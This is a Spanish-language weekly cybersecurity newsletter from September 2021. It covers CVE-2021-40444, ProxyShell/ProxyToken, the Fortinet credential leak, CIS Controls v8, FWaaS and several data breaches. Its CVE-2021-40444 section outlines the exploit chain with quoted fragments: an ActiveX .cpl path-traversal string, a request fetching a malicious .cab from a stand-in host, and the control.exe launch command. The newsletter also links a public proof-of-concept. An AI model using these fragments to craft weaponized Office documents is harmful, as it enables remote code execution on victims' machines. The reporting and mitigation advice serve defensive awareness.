Esta semana en ciberseguridad – Septiembre semana 3

CVE-2021-40444 – Microsoft publicó el parche para MSHTML

Microsoft publicó la actualización KB5005565 para vulnerabilidad Zero-Day CVE-2021-40444 crítica en el motor de renderizado MSHTML. Esta vulnerabilidad permite la ejecución de comandos en la máquina de la víctima cuando esta abre un documento especialmente diseñado y hace clic en “Habilitar contenido” para deshabilitar la función Vista protegida de Microsoft Office.

Les dejamos un resumen de cómo funciona el exploit y en las fuentes algunos link para generar algunas pruebas de concepto de este.

Funcionamiento del exploit
1. El documento contiene un objeto MHTML OLE que es un sitio web alojado en un endpoint controlado por un atacante.
2. El sitio web ejecuta código JavaScript ofuscado que crea una instancia de los controles ActiveX:

ActiveXObjectVAR[‘Script’][‘location’] = ‘.cpl:../../../AppData/Local/Temp/Low/championship.inf’

3. El código del sitio web obtiene y abre un archivo .cab desde el endpoint controlado por el atacante que contiene una DLL maliciosa con extension .inf:

XMLHttpRopen[‘call’](XMLHttpR, ‘GET’, ‘http://127.0.0.1/test.cab’, ![]).

4. El código del sitio web ejecuta el archivo .inf como un archivo del Panel de control (.cpl) utilizando la utilidad control.exe. Por ejemplo, el código del sitio web puede ejecutar el siguiente comando: control.exe .cpl:

../../../AppData/Local/Temp/championship.inf.

5. La utilidad control.exe se ejecuta como un proceso secundario del proceso que aloja la aplicación de Microsoft Office que abrió el documento de Office, como winword.exe.
6. El archivo DLL malicioso .inf se ejecuta en el contexto de rundll32.exe.

Hasta ahora las mitigaciones contra CVE-2021-40444 iban desde sugerir que se deshabilite ActiveX para la mayoría o todas las zonas de seguridad de Internet Explorer, así como deshabilitar el Shell Preview en el Explorador de Windows; esto se puede hacer a través de la Política de grupo o localmente a través de claves de registro.

FUENTE: (1) https://blog.segu-info.com.ar/2021/09/microsoft-publica-el-parche-para-el-0.html
(2) https://github.com/lockedbyte/CVE-2021-40444

Microsoft publicó su Update de Seguridad de Septiembre

CSIRT – El equpo de respuesta ante incidentes de Seguridad Informática del Gobierno de Chile, publicó esta semana las recomendaciones sobre 66 vulnerabilidades informadas por Microsoft en su Update Tuesday de Septiembre.

En la fuente les dejamos el inserto de Microsoft.

FUENTE: https://msrc.microsoft.com/update-guide/releaseNote/2021-Sepnk

v8 Controles CIS

Aunque no de esta semana, hoy queremos recordar el cambio de version de los Controles CIS.

El mes de Mayo del 2021, el Centro for Internet Security (CIS) lanzó oficialmente la versión 8 de los controles CIS, que se mejoró para mantenerse al día con la tecnología imperante en nuestros días y la creciente evolución de las amenazas. La pandemia cambió muchas cosas y esta nueva version de los controles CIS ahora incluye tecnologías móviles y cloud. tanto como un nuevo control “Service Provider Management” que da orientación de como las empresas pueden administrar sus servicios en nube.

Enfoque basado en tareas independientes de quien ejecuta el control.
Dado que las redes básicamente no tienen fronteras, lo que significa que ya no hay una red cerrada y centralizada donde residen todos los puntos finales, los controles ahora están organizados por actividad frente a cómo se administran las cosas.

Los esfuerzos para simplificar los controles y organizarlos por actividad dieron como resultado menos controles y menos salvaguardas (anteriormente subcontroles). Ahora hay 18 controles de nivel superior y 153 salvaguardas, distribuidos entre los tres Grupos de Implementación (GI).

Higiene basica
CIS Controls v8 define oficialmente IG1 cómo Higiene Básica y representa un estándar mínimo emergente de seguridad de la información para todas las empresas. IG1 (56 salvaguardas) es un conjunto fundamental de salvaguardas de ciberdefensa que toda empresa debe aplicar para protegerse contra los ataques más frecuentes.

El IG2 (74 salvaguardas adicionales) y el IG3 (23 salvaguardas) se basan en IG anteriores, siendo el IG1 la vía de acceso a los controles y el IG3 que incluye todas las salvaguardas para un total de 153.

El Informe de Investigaciones de Violación de Datos de Verizon (DBIR) de 2021 publicado recientemente ya menciona a CIS Controls v8 y los nuevos grupos de implementación. Verizon identificó un conjunto básico de controles que toda empresa debería implementar independientemente de su tamaño y presupuesto:

  • Control 4: Configuración segura de activos y software empresariales
  • Control 5: Gestión de cuentas
  • Control 6: Gestión del control de acceso
  • Control 14: Concientización sobre seguridad y capacitación en habilidades

Lo nuevo
Como es de costumbre, los cambios se basan en lo realmente importante y los objetivos de los Controles CIS:

  • El Ataque como referencia para la Defensa.
  • Foco en la identificación y priorización de los aspectos más críticos para detener los ataques más relevantes.
  • Salvaguardas viables y aplicables.
  • Controles medibles.

Adicionalmente, la nueva version de los controles CIS se alinean con otros framework o marcos regulatorios de gobierno y gestión. Los cuales hablan de las nuevas tendencias sobre servicios cloud, virtualización, movilidad, externalización y teletrabajo.

FUENTE: https://blog.segu-info.com.ar/2021/05/controles-cis-v8-18-es-el-nuevo-20.html
https://www.cisecurity.org/

Esta semana en ciberseguridad – Septiembre semana 2

Vulnerabilidad Zero-Day de Severidad 8.8/10 en MSHTML está afectando a usuarios de Microsoft Office.

Microsoft ha informado de una vulnerabilidad Zero-Day identificada como CVE-2021-40444, cuya explotación permite la ejecución remota de código malicioso en el sistema operativo de las víctimas. Y, lo que es peor, los ciberdelincuentes ya están utilizando la vulnerabilidad para atacar a los usuarios de Microsoft Office. Por lo tanto, Microsoft recomienda que los administradores de red Windows empleen una solución alternativa temporal hasta que la empresa pueda implementar un parche. Diferentes expertos lograron reproducir el ataque en la última versión de Office 2019/Office 365 en equipos con Windows 10 tratándose de un fallo lógico y realmente peligroso.

En esta ocasión, la vulnerabilidad CVE-2021-40444 se ha catalogado como importante con una severidad de 8.8 sobre 10 afectando a Windows Server desde 2008 hasta 2019, y a los sistemas operativos Windows desde la versión 8 a la 10. Los usuarios más vulnerables a este tipo de ataques son los que operan con cuentas con derechos administrativos.

La vulnerabilidad está en MSHTML, el motor de Internet Explorer y, aunque ya son pocos los que utilizan IE (incluso Microsoft recomienda encarecidamente cambiarse a su nuevo navegador, Edge), el viejo navegador sigue siendo parte de los sistemas operativos modernos y algunos otros programas utilizan este motor para gestionar el contenido web. En particular, las aplicaciones de Microsoft como Word y PowerPoint dependen de él.

Cómo explotan los atacantes la CVE-2021-40444
Los ataques aparecen como controles ActiveX maliciosos incrustados en documentos de Microsoft Office. Estos controles permiten la ejecución de código arbitrario; lo más probable es que los documentos lleguen como archivos adjuntos en mensajes de correo electrónico. Como con cualquier documento adjunto, los atacantes tienen que persuadir a las víctimas para que abran el archivo.

En teoría, Microsoft Office gestiona los documentos recibidos por Internet en Vista protegida o mediante Protección de aplicaciones para Office (Application Guard for Office), que pueden evitar un ataque de la CVE-2021-40444. Sin embargo, los usuarios podrían hacer clic en el botón de Habilitar edición sin pensarlo y desarmar los mecanismos de seguridad de Microsoft.

Cómo proteger a tu empresa contra la CVE-2021-40444
Microsoft ha prometido investigar y, si fuera necesario, liberar un parche oficial. Dicho esto, no esperamos que este parche esté listo antes del 14 de septiembre, el próximo martes de Parches. En circunstancias normales, la empresa no anunciaría una vulnerabilidad antes de liberar la solución, pero dado que los ciberdelincuentes ya están explotando la CVE-2021-40444, Microsoft recomienda emplear un método alternativo de inmediato.

Esta alternativa consiste en prohibir la instalación de nuevos controles ActiveX. Esto lo puedes hacer al añadir unas cuantas claves al registro del sistema. Microsoft proporciona información detallada sobre la vulnerabilidad, incluida una sección de alternativas (en la que también puedes aprender cómo deshabilitarla una vez que ya no la necesites). De acuerdo con Microsoft, esta alternativa no debería afectar el desempeño de los controles ActiveX que ya están instalados.

Recomendaciones:

  • Instalar una solución de seguridad a nivel de la puerta de enlace del correo electrónico o mejorar los mecanismos de seguridad estándar de Microsoft Office 365 para proteger el correo corporativo de los ataques.
  • Equipar todos los ordenadores de los empleados con soluciones de seguridad que puedan detectar la explotación de vulnerabilidades.
  • Mantener a los empleados al tanto de las ciberamenazas modernas de manera frecuente y, en particular, recordarles que nunca abran documentos de fuentes no confiables, y que mucho menos activen la edición de documentos a menos que sea absolutamente necesario.

PD: (1) Les dejo un video explicativo en las fuentes y (2) Las recomendaciones de CSIRT

FUENTE: https://www.kaspersky.es/blog/cve-2021-40444-vulnerability-mshtml/25950/
https://www.youtube.com/watch?v=Oz16xte5UeU
https://www.csirt.gob.cl/vulnerabilidades/9vsa21-00488-01/

Lista de IP vulnerables de Fortinet.

Fortinet ha descubierto que un actor malintencionado ha revelado recientemente información y una lista de acceso a 87.000 dispositivos FortiGate SSL-VPN. Estas credenciales se obtuvieron de sistemas que permanecían sin parchear contra FG-IR-18-384 / CVE-2018-13379. Si bien pueden haber sido parcheados desde entonces, si las contraseñas no se restablecieron, siguen siendo vulnerables.

Este listado fue publicados de forma gratuita por ex miembros de la pandilla Babuk quienes quieren comenzar su propio negocio de ransomware, dagnabbit.

Este incidente está relacionado con una antigua vulnerabilidad resuelta en mayo de 2019. En ese momento, Fortinet emitió un aviso de PSIRT y se comunicó directamente con los clientes. Además, Fortinet publicó posteriormente varias publicaciones en blogs corporativos que detallaban este problema, alentando encarecidamente a los clientes a actualizar los dispositivos afectados. Además de avisos, boletines y comunicaciones directas, estos blogs se publicaron en agosto de 2019, julio de 2020, abril de 2021 y nuevamente en junio de 2021.

Fortinet reitera que, si en algún momento su organización estaba ejecutando alguna de las versiones afectadas que se enumeran a continuación, incluso si se han actualizado los dispositivos, también debe realizar el restablecimiento de contraseña de usuario recomendado después de la actualización, según el boletín de atención al cliente y otras advertencias. información. De lo contrario, puede seguir siendo vulnerable después de la actualización si las credenciales de sus usuarios se vieron comprometidas anteriormente.

Recomendaciones
Si estas ejecutando una versión afectada, actualizar a FortiOS 5.4.13, 5.6.14, 6.0.11, o 6.2.8 y superior. Y sigue las siguientes recomendaciones dadas por Fortinet:

  • Desactivar todas las VPN (SSL-VPN o IPSEC) hasta que se hayan realizado los siguientes pasos de corrección.
  • Actualizar inmediatamente los dispositivos afectados a la última versión disponible, como se detalla a continuación.
  • Tratar todas las credenciales como potencialmente comprometidas al realizar un restablecimiento de contraseña en toda la organización.
  • Implementar la autenticación multifactor, que ayudará a mitigar el abuso de cualquier credencial comprometida, tanto ahora como en el futuro.
  • Notificar a los usuarios para exaplicarle el motivo del restablecimiento de la contraseña y supervisar en servicios como HIBP para su dominio. Existe la posibilidad de que, si las contraseñas se han reutilizado para otras cuentas, se puedan utilizar en ataques de relleno de credenciales.

FUENTE: https://blog.segu-info.com.ar/2021/09/lista-de-ip-vulnerables-de-fortinet.html
https://threatpost.com/thousands-of-fortinet-vpn-account-credentials-leaked/169348/
https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials

El riesgo que suponen los keyloggers.

Esta semana CSIRT publicó una interesante guía de que es un Keyloggers y que riesgos supone. En las fuentes les dejo donde bajar esta guía.

Los keyloggers son programas o aparatos que registran todo lo que un usuario teclea en su computador o celular. Programas más avanzados pueden registrar lo que copiamos en el portapapeles, llamadas realizadas, datos del GPS o lo grabado por la cámara y el micrófono. Estos programas luego envían la información a los ciberdelincuentes.

FUENTE: https://www.csirt.gob.cl/media/2021/09/Doc.-Landing-KEYLOGGER-2021-.pdf

Esta semana en ciberseguridad – Septiembre semana 1

Vulnerabilidad Critica calificada con un rating CVSS 9.8/10 en Productos Cisco

Este Miércoles 1 de Septiembre, Cisco remedio un error crítico, calificado con un rating CVSS 9.8/10, en su software “Cisco Enterprise NFVIS”, para el cual existe un exploit de prueba de concepto (PoC) disponible públicamente.

Cisco Enterprise NFVIS es un software de infraestructura basado en Linux que ayuda a los proveedores de servicios y otros clientes a implementar funciones de red virtualizadas, como routers virtuales y firewalls, así como aceleración WAN, en dispositivos Cisco compatibles. También proporciona aprovisionamiento automatizado y administración centralizada.

La vulnerabilidad de omisión de autenticación en Enterprise NFV Infrastructure Software (NFVIS) ha sido identificada como CVE-2021-34746 y podría permitir que un atacante remoto no autenticado eludir la autenticación e iniciar sesión en un dispositivo vulnerable como administrador.

“Un atacante podría aprovechar esta vulnerabilidad inyectando parámetros en una solicitud de autenticación”…. “Un exploit exitoso podría permitir al atacante eludir la autenticación e iniciar sesión como administrador en el dispositivo afectado”.

explicó Cisco en su aviso de seguridad.

Si la autenticación TACACS está activada, eres vulnerable
La vulnerabilidad se debe a la validación incompleta de la entrada proporcionada por el usuario que se pasa a una secuencia de comandos de autenticación durante el inicio de sesión. La falla se encuentra en Cisco Enterprise NFVIS Release 4.5.1 si el método de autenticación externa TACACS está configurada (característica presente en la funcionalidad de AAA -autenticación, autorización y contabilidad – del software).

Cisco dijo que las configuraciones que usan RADIUS o autenticación local no se ven afectadas.

Recomendación
No existen alternativas para mitigar esta vulnerabilidad, por lo que la recomendación es actualizar. Los parches para solucionar el error están disponibles en las versiones 4.6.1 y posteriores de Enterprise NFVIS.

Cisco dijo que está al tanto del código de explotación de PoC disponible públicamente, pero que no ha visto ningún exploit malicioso exitoso en este momento.

FUENTE: https://threatpost.com/cisco-patches-critical-authentication-bug-with-public-exploit/169146/

Proxytoken: bypass de autenticación en Microsoft Exchange Server

Está siendo un año especialmente duro para Microsoft en cuanto a vulnerabilidades en sus productos y Exchange es sin duda uno de los principales focos. Si a principios de marzo se publicó Proxylogon, cuatro vulnerabilidades (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) que encadenadas daban lugar a un RCE sin autenticación previa, a principios de agosto nos topamos con Proxyshell, tres vulnerabilidades (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) que nos conseguían lo propio, otro bonito RCE.

Serie de ataques a MS Exchange descubiertos por Orange:

Pues bien, hoy traemos ProxyToken descubierta por Le Xuan Tuyen de VNPT ISC en marzo de 2021 y solucionada por Microsoft en los parches acumulativos de julio, esta vez una sola vulnerabilidad con CVE-2021-33766 y por la que “un atacante no autenticado puede realizar acciones de configuración en los buzones de correo que pertenecen a usuarios arbitrarios”. Y lo peor, su explotación es trivial.

Microsoft Exchange crea dos sitios en IIS:

  • Uno es el sitio web predeterminado, que escucha en los puertos 80 para HTTP y 443 para HTTPS. Este es el sitio al que se conectan todos los clientes para acceder a la web (OWA, ECP) y para servicios web externos. Es decir, es el front-end.
  • El otro sitio se llama “Exchange Back End” y escucha en los puertos 81 para HTTP y 444 para HTTPS.

El sitio web de front-end es principalmente un proxy para el back-end. Para permitir el acceso que requiere autenticación de formularios, la interfaz sirve páginas como /owa/auth/logon.aspx. Para todas las solicitudes posteriores a la autenticación, la función principal del front-end es volver a empaquetar las solicitudes y enviarlas a los end-points correspondientes en el back-end. Luego, recopila las respuestas de dicho back-end y las reenvía al cliente.

Sigue este link para algunos ejemplos específicos.
https://www.hackplayers.com/2021/09/proxytoken-un-bypass-de-autenticacion-de-exchange.html

FUENTE: https://threatpost.com/microsoft-exchange-proxytoken-email/169030/
https://www.hackplayers.com/2021/09/proxytoken-un-bypass-de-autenticacion-de-exchange.html

¿Que es un Firewall as a service (FWaaS) ?

El Firewall as a Services o Firewall como servicio “FWaaS“, se construye y se ofrece desde la nube. Cuando un dispositivo o una aplicación se conecta a un servicio FWaaS a través de Internet, automáticamente se le aplican reglas de dominio, filtrado URL y otras medidas de seguridad que habitualmente utilizan los cortafuegos físicos, configurándose en este sentido en función de las necesidades.

El objetivo, es que gracias a este servicio de seguridad, las compañías puedan dejar de depender de hardware que, en un momento determinado puede quedar obsoleto, reducir la inversión inicial en tecnologías de seguridad y facilitar la extensión del firewall a todo tipo de ubicaciones.

Entonces, un usuario o una aplicación se conecta al FWaaS a través de Internet y el servicio aplica reglas de dominio, filtrado URL y otras medidas de seguridad que utilizan los dispositivos de firewall físicos. La idea es reemplazar la multitud de firewalls de hardware que necesitaría para proteger todo el tráfico de la empresa desde todos los diferentes sitios operativos con conexiones seguras de Internet al servicio.

¿Es mejor un FWaaS que un Firewall tradicional?
En realidad, salvo el componente cloud, en poco se diferencia un FWaaS con respecto de ese firewall físico que podamos instalar en nuestro DC, de hecho, que el FWaaS haya crecido en popularidad no ha impactado demasiado en la venta de dispositivos dedicados y especialmente en empresas de tamaño medio que no suelen contar con muchas ubicaciones, estos dispositivos siguen siendo una apuesta segura.

En algunos aspectos sigue siendo más interesante apostar por una inversión inicial, pero, a causa de la longevidad de los FW tradicionales se va diluyendo rápidamente con el paso del tiempo, al de un servicio que vamos a tener que seguir pagando mes a mes. Por otro lado, al ser dispositivos on-premises, pueden prometernos una latencia inferior a la que vamos a encontrar en la nube.

Dicho esto y tal y como hemos dicho anteriormente, la dispersión de los trabajadores ha provocado que, en los últimos meses, la adopción de servicios del tipo FWaaS no paren de crecer. Hablamos de Firewall que virtualmente pueden proteger cualquier tipo de conexión, desde cualquier ubicación remota.

En este sentido y tal y como apunta Gartner, de mantenerse la actual tendencia de teletrabajo, el mercado del FWaaS podría crecer desde los 251 millones de dólares actuales, hasta los 2.600 millones de dólares para el año 2025. Eso daría a FWaaS una cuota del 21% del mercado, en menos de cinco años.

¿Cómo funciona FWaaS exactamente?
Es conceptualmente bastante simple: hace precisamente las mismas cosas que hace un firewall local, simplemente las hace de forma remota, ya sea desde un punto de presencia físico en un centro de datos en algún lugar o en la nube. La ubicación precisa de donde ocurre la carga de trabajo del firewall varía según el proveedor.

También vale la pena señalar que los proveedores de redes a menudo incluyen FWaaS con SD-WAN o simplemente se usa en conjunto con otra oferta de SD-WAN. Se convierte en otra conexión que la SD-WAN administra y proporciona protección de firewall administrada de forma centralizada.

¿Cómo se despliega?
Es considerablemente más fácil que implementar una cantidad sustancial de dispositivos de hardware en numerosas sucursales, pero tampoco es lo más simple del mundo, según Adam Hils, director senior de investigación de Gartner.

“Las organizaciones deben obtener algún tipo de comprensión de qué tipo de acceso necesitan en cada sucursal y configurar el firewall”…. “Esto puede implicar múltiples configuraciones, pero, de nuevo, no es tan complejo como colocar miles de firewalls físicos en una red y tener que configurarlos”.

Adam Hils, director senior de investigación de Gartner.

¿Los firewalls en la nube y FWaaS son lo mismo?
El firewall en la nube es un término de marketing y, según el gerente de investigación de IDC, Chris Rodríguez, no es particularmente útil. “Yo advierto contra el firewall en la nube porque es confuso. ¿Es un firewall en la nube o un firewall que protege una red en la nube?” dijo. Entonces, la respuesta corta es firewall en la nube y FWaaS no son necesariamente lo mismo.

¿Cuáles son las desventajas de FWaaS?
Desde el punto de vista de opex, FWaaS puede ser costoso y no se vuelve más barato con el tiempo como lo haría un grupo de firewalls físicos. Por otro lado, existe el problema de los pequeños retrasos en la transmisión y latencia a medida que el tráfico se filtra a través del FWaaS.

“Puede haber cierta latencia porque tienes que enviar el tráfico de usuarios a través de esa nube y hacia donde sea que se dirija”, si, por ejemplo, el punto de presencia más cercano de un proveedor de FWaaS está inactivo, los tiempos de ida y vuelta para las conexiones que usaban ese punto serían sustancialmente más largos.

dijo Hils

¿Qué pasará con los dispositivos de firewall tradicionales?
Posiblemente nada. Los firewall físicos siguen siendo bastante populares, especialmente para empresas sin muchas ubicaciones diferentes y sin muchos trabajadores remotos. Incluso tienen algunas ventajas sobre FWaaS, como diferentes perfiles de costos. Los firewalls locales son un gasto de capital inicial, pero tienden a ser más baratos con el tiempo. También tienen menor latencia.

¿Por qué los FWaaS cobran relevancia ahora?
La pandemia y el aumento concomitante del trabajo remoto dificultaron las cosas para las empresas que necesitaban que las conexiones de sus empleados estuvieran protegidas en todo momento. FWaaS puede proteger las conexiones provenientes de cualquier lugar, desde una sucursal o incluso desde el estudio de un trabajador remoto.

Gartner estima que los FWaaS pasaran de una industria de U$S 251 millones a aproximadamente U$S 2.6 mil millones para 2025, suponiendo que continúen las tendencias actuales de trabajo remoto. Eso le daría a FWaaS una participación del 21% del mercado de firewall de aproximadamente U$S 12 mil millones en menos de cinco años. La mayor parte del crecimiento más rápido se ha producido en América del Norte y Europa.

FUENTE: https://www.networkworld.com/article/3631055/what-is-firewall-as-a-service.html?nsdr=true

Esta semana en ciberseguridad – Semana Agosto/Septiembre

Más de 620.000 fotos de cuentas de iCloud fueron robadas

Un juicio contra un hombre de California, acusado de acceder a las cuentas de iCloud de cientos de personas y de descargar más de 620.000 fotos y 9.000 vídeos, vuelve a poner de manifiesto un problema que lleva años produciéndose y que ha afectado a todo tipo de personas, pero especialmente a mujeres que ven expuestas sus imágenes privadas y cómo estas se comparten por Internet.

En esta ocasión, el responsable de estos robos se declaró culpable recientemente de cuatro cargos, que incluyen el acceso no autorizado a sistemas informáticos y la suplantación de un agente del servicio técnico de Apple. Este delincuente consiguió acceder a las cuentas de, al menos, 306 víctimas localizadas en los Estados Unidos y de las cuales robó una gran cantidad de fotografías y vídeos.

Como era de esperar, sus principales objetivos eran mujeres jóvenes, y el material que más le interesaba era el que contenía desnudos de sus víctimas. Una vez obtenido este material lo utilizaba para intercambiarlo por otro similar o lo guardaba para su colección privada. Además, también ha reconocido haber accedido a alrededor de 200 cuentas de iCloud a petición de otros usuarios que conoció online.

De acuerdo con los documentos que se han publicado de este juicio, tanto el acusado como sus colaboradores hacían uso de un servicio de correo electrónico cifrado para comunicarse de forma anónima. Cuando este grupo encontraba fotos de sus víctimas desnudas en las cuentas de iCloud a las que accedían de forma ilegal lo consideraban una victoria y muchas veces las compartían entre ellos.

Para poder acceder a las cuentas de iCloud de las víctimas el delincuente suplantó la identidad de un agente de Apple para ganarse su confianza, una técnica que se ha venido utilizando desde hace años. Para ello usó dos direcciones de correo que podrían pasar por legítimas para los usuarios menos experimentados, como son “applebackupicloud” y “backupagenticloud”, las cuales contenían más de medio millón de emails, incluyendo alrededor de 4.700 correos con nombres de usuario y contraseñas de iCloud.

Protegiendo cuentas de iCloud
Este caso es solo el último de una larga lista de incidentes relacionados con accesos no autorizados a cuentas de iCloud, incidentes que han afectado incluso a celebridades. Si echamos la vista atrás recordaremos casos como el acontecido hace ahora 7 años, donde se filtraron fotografías íntimas de famosas como Jennifer Lawrence, Ariana Grande, Rihanna, Kate Upton o Kim Kardashian, entre muchas otras.

Desde entonces ha pasado mucho tiempo, y se han añadido medidas de seguridad que dificultan que un atacante pueda tomar el control de una cuenta de iCloud tan solo con las credenciales de acceso. Por ese motivo es importante adoptar ciertas precauciones como las que mencionamos a continuación:

  • A pesar de que los correos de phishing usados por los delincuentes han experimentado mejoras con respecto a los usados hace años y ya no resulta tan fácil distinguirlos de los legítimos, aún podemos evitar caer en muchas de las trampas preparadas por los delincuentes si nos detenemos a revisar quién envía el correo o el enlace al que se nos quiere redirigir. Si observamos que el correo o enlace proviene de un dominio que no es el esperado de la empresa o servicio, debemos sospechar de ese mensaje.
  • De la misma forma, los delincuentes han mejorado mucho la redacción de estos mensajes en varios idiomas, ya sea porque usan a nativos para redactarlos o incluso traductores apoyados por inteligencia artificial. Aun así, seguimos pudiendo encontrar muchos mensajes con fallos en su redacción, ya sea cometiendo faltas de ortografía o con problemas a la hora de representar ciertos caracteres propios de algunos idiomas (como la ñ en el español).
  • La implementación de medidas adicionales de seguridad como la autenticación multifactor es algo necesario, puesto que añade una capa adicional de seguridad y dificulta a los delincuentes el acceso a nuestras cuentas. Además, Apple permite utilizar otro de nuestros dispositivos Apple como un factor de autenticación y mostrar en él el código de verificación, algo que podemos hacer siguiendo la guía preparada para tal efecto.

FUENTE: https://blogs.protegerse.com/2021/08/27/roban-620-000-fotos-desde-cuentas-de-icloud-haciendose-pasar-por-un-empleado-de-apple/

Roban datos de Zurich Seguros y difunden los clientes de España

Un grupo de ciberdelincuentes ha robado los datos de los clientes de Zurich Seguros en España. La compañía ha sufrido el robo de las bases de datos de parte de sus clientes en España, tal y como revelaron un grupo de ciberdelincuentes, que ha puesto a la venta dicha base de datos en un conocido foro de la dark web dedicado a la compraventa de material procedente de ciberataques.

El grupo asegura contar con una base de datos con más de 4,7 millones de líneas de información. Para demostrar el robo, ha difundido parte del material robado. Se trata de un archivo en el que aparecen más de 26.000 personas y empresas y la siguiente información:

  • Nombre y apellidos
  • DNI
  • Vehículo asegurado: modelo, matrícula y prestaciones
  • Teléfono
  • Dirección de su domicilio
  • Correo electrónico
  • Fecha de la póliza de seguros
  • Agente de Zurich que lleva su póliza

El Confidencial de España ha accedido a la información filtrada por los ciberdelincuentes y ha comprobado, mediante la puesta en contacto con varias de las personas que aparecen en dichos ficheros, que se trata de clientes de Zurich Seguros en España.
También ha podido identificar la identidad de varios de los agentes de la compañía que aparecen en el archivo y que, efectivamente, trabajan en la entidad.

“Hay información como para poder suplantar la identidad de un tercero, conocer los vehículos que tiene a su nombre una persona (un famoso, por ejemplo, o un político con sus matrículas), usar los datos personales para contratar líneas de telefonía, hacerse pasar por clientes de Zurich para obtener la cuenta corriente vinculada a los pagos.”

Vicente Delgado, detective y experto en ciberseguridad

Según ha revelado Zurich, el 12 y 13 de agosto se produjeron obtenciones ilícitas de información de algunos de los clientes de la empresa en España. Los mecanismos de control y gestión de ciberseguidad de la aseguradora se activaron desde el primer momento para determinar la causa y el origen del incidente, tal y como asegura la propia compañía. Afirman que después de los primeros análisis, los indicios señalaban que se podía tratar de una afectación limitada a una línea de negocio lo que supondría un limitado porcentaje de clientes. Ahora mismo están a la espera de los resultados del informe de investigación.

La base de datos, en venta: 0,025 BTC (USD 1.000)
El precio resulta sorprendentemente bajo. Por ponerlo en contexto y en comparación, a la empresa tecnológica Garmin le pidieron 10 millones de dólares (214 ‘bitcoins’) el año pasado y a Acer 50 millones de dólares (1.074 ‘bitcoins’) este 2021. En el caso de Zurich Seguros, la base de datos está a la venta por apenas 0,025 BTC.

De todos modos, los precios de Garmin y Acer no son comparables a los del robo a Zurich Seguros. En los dos primeros casos, la cantidad fue requerida a las empresas atacadas (que se supone que estarían dispuestas a pagar más), mientras que los 1.000 dólares de la base de datos de Zurich Seguros es el precio público de venta para cualquier otro ciberdelincuente (que se supone que ofrecerá menos dinero) que quiera comprarla.

Poner una base de datos a la venta en el mercado negro es una táctica habitual cuando el ciberdelincuente ha intentado chantajear económicamente a su víctima pero no ha conseguido su objetivo. En este caso, El confidencial aún no ha podido comprobar este punto con el equipo de Zurich Seguros.

El origen del ataque aún es desconocido. Para Vicente Delgado, “de momento no hay información disponible acerca de la intrusión, pero no parece estar relacionado con algún tipo de ‘ransonware’, sino con algún tipo de mala configuración de la web de Zurich para mediadores”. Además, “las personas que están poniendo a disposición de terceros la base de datos parecen haberla recabado de un foro de terceros”, asegura, algo que podría explicar el bajo precio.

FUENTE: https://www.elconfidencial.com/tecnologia/2021-08-13/zurich-seguros-robo-ciberataque-hackers_3230922/

Error crítico de Azure Cosmos DB que permite la adquisición total de cuentas en la nube

Una vulnerabilidad de seguridad crítica en la plataforma de base de datos en la nube Azure de Microsoft, Cosmos DB, podría haber permitido la toma de control remota completa de cuentas, con derechos de administrador para leer, escribir y eliminar cualquier información en una instancia de base de datos.

Si bien, no está claro si los clientes de Microsoft sufrieron violaciones durante el período de meses en el que el error #ChaosDB en Jupyter Notebooks fue explotable. Según los investigadores de Wiz, cualquier cliente de Azure podría acceder a la cuenta de otro cliente, sin autenticación. El error, denominado #ChaosDB, podría explotarse trivialmente y “afecta a miles de organizaciones, incluidas numerosas empresas Fortune 500”.

Microsoft deshabilitó el componente defectuoso después de que Wiz lo alertó y notificó a más del 30 por ciento de los clientes de Cosmos DB sobre el problema, pero “creemos que el número real de clientes afectados por #ChaosDB es mayor”, según un artículo de Wiz, publicado el jueves.

La firma agregó que se desconoce cualquier explotación previa y que “la vulnerabilidad ha sido explotable durante meses y todos los clientes de Cosmos DB deben asumir que han estado expuestos”.

Por cierto, el problema no tiene CVE porque los errores de nube no están designados dentro de ese sistema, agregaron los investigadores.

Detalles de error escasos para #ChaosDB
El problema existe en la función Jupyter Notebook de Cosmos DB, según el análisis. Jupyter Notebook es una aplicación web de código abierto que permite a los usuarios crear y compartir documentos que contienen código en vivo, ecuaciones, visualizaciones y texto narrativo.

“Los Jupyter Notebooks integrados en Azure Cosmos DB se integran directamente en el portal de Azure y sus cuentas de Azure Cosmos DB, lo que los hace convenientes y fáciles de usar”, según la documentación de Microsoft. “Los desarrolladores, científicos de datos, ingenieros y analistas pueden utilizar la experiencia familiar de Jupyter Notebooks para realizar exploración de datos, limpieza de datos, transformaciones de datos, simulaciones numéricas, modelado estadístico, visualización de datos y aprendizaje automático”.

Sin embargo, los investigadores de Wiz encontraron que al consultar información sobre un Jupyter Notebook de Cosmos DB de destino, es posible obtener credenciales no solo para la instancia de computación de Jupyter Notebook y la cuenta de Jupyter Notebook Storage de otro usuario, sino también para la cuenta de Cosmos DB, en si. También la clave primaria de lectura y escritura utilizada para cifrarlo.

“Con estas credenciales, es posible ver, modificar y eliminar datos en la cuenta de Cosmos DB de destino a través de múltiples canales”, según Wiz.

La compañía no proporciona más detalles técnicos más allá del hecho de que #ChaosDB en realidad está formado por una serie de vulnerabilidades que pueden encadenarse; pero proporcionó un diagrama de ataque:

FUENTE: https://threatpost.com/azure-cosmos-db-bug-cloud/168986/

Esta semana en ciberseguridad – Agosto, Semana 4

El exploit #ProxyShell, afecta a casi 2.000 servidores de Exchange.

Que es ProxyShell?

ProxyShell es una colección de tres fallas de seguridad diferentes, descubiertas por el investigador de seguridad taiwanés Orange Tsai, que se pueden utilizar para tomar el control de los servidores de correo electrónico de Microsoft Exchange.
Éstos incluyen:

  • CVE-2021-34473 proporciona un mecanismo para la ejecución remota de código previo a la autenticación, lo que permite a los actores malintencionados ejecutar código de forma remota en un sistema afectado.
  • CVE-2021-34523 permite la ejecución de código arbitrario después de la autenticación en los servidores de Microsoft Exchange debido a una falla en el servicio PowerShell que no valida adecuadamente los tokens de acceso.
  • CVE-2021-31207 permite ejecutar código arbitrario en el contexto de SYSTEM y escribir archivos arbitrarios.

Casi 2.000 Servidores de Exchange han sido hackeados

Un escaneo realizado el 8 de agosto por ISC SANS, dos días después de la publicación del código de prueba de concepto de ProxyShell, encontró que más de 30.400 servidores Exchange de un total de 100.000 sistemas que aún no se habían parcheado y seguían siendo vulnerables a los ataques.

Casi 2.000 servidores de correo electrónico de Microsoft Exchange han sido hackeados en los últimos días y se han infectado con backdoor porque los propietarios no instalaron los parches correspondientes.

